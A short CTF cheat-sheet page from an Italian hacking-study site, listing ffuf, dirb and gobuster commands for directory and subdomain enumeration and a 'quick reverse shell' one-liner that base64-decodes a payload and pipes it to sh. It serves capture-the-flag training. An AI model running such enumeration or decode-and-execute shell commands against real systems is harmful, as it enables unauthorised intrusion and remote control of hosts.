Lorenzo Bruno
Italian
Italian
  • Welcome on board
  • HackTheBox
    • Quickstart
      • Writeups
        • TwoMillion
        • LinkVortex
        • Chemistry
        • Titanic
        • Moon
  • TryHackMe
    • Quickstart
      • Writeups
        • Pickle Rick
        • Pyrat
        • Lookup
        • Vulnversity
      • Advent of Cyber 2024
        • Writeups
          • Day 1: Maybe SOC-mas music, he thought, doesn't come from a store?
          • Day 2: One man's false positive is another man's potpourri.
          • Day 3: Even if I wanted to go, their vulnerabilities wouldn't allow it.
          • Day 4: I’m all atomic inside!
  • Sviluppo Malware
    • Basi
  • Corso python
    • Benvenuti
      • Esercizi
        • esercizio_01
        • esercizio_02
        • esercizio_03
        • esercizio_04
        • esercizio_05
        • esercizio_06
        • esercizio_07
        • esercizio_08
        • esercizio_09
        • esercizio_10: Challenge
        • esercizio_11
        • esercizio_12
        • esercizio_13
        • esercizio_14
        • esercizio_15: Challenge n.2
        • esercizio_16
        • esercizio_17
      • Slide
      • Hall of fame
  • Useful websites and materials
Powered by GitBook
On this page
  • Useful websites
  • Content Discovery
  • Quick reverse shell

Useful websites and materials

This page contains useful websites and commands for carrying out CTF

PreviousHall of fame

Last updated 3 months ago

Useful websites


Content Discovery

ffuf -w common.txt -u http://MACHINE_IP/FUZZ

Subdomain enumeration

ffuf -w DNS/namelist.txt -H "Host: FUZZ.DOMAIN.NAME" -u http://MACHINE
dirb http://MACHINE_IP/ common.txt
gobuster dir --url http://MACHINE_IP/ -w common.txt

Quick reverse shell

echo "<PayloadBASE64>" | base64 -d | sh
Reverse shell generator
Cipher identifier
Hash cracking
JavaScript Deobfuscator and Unpacker